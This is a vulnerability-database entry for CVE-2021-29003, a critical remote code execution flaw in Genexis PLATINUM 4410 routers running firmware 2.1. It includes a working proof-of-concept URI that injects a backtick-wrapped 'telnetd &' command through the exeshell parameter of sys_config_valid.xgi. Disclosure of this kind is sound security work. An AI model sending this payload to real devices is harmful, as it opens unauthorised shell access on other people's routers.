vendor:
PLATINUM 4410
by:
Jay Sharma
9.8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: PLATINUM 4410
Affected Version From: V2.1
Affected Version To: V2.1
Patch Exists: YES
Related CWE: CVE-2021-29003
CPE: h:genexis:platinum_4410:2.1
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2021
Genexis PLATINUM 4410 2.1 P4410-V2-1.28 – RCE
Genexis PLATINUM 4410 2.1 P4410-V2-1.28 devices allow remote attackers to execute arbitrary code via shell metacharacters to sys_config_valid.xgi, as demonstrated by the http://x.x.x.x/sys_config_valid.xgi?exeshell=%60telnetd%20%26%60 URI.
Mitigation:
Apply the latest security patches to the affected device.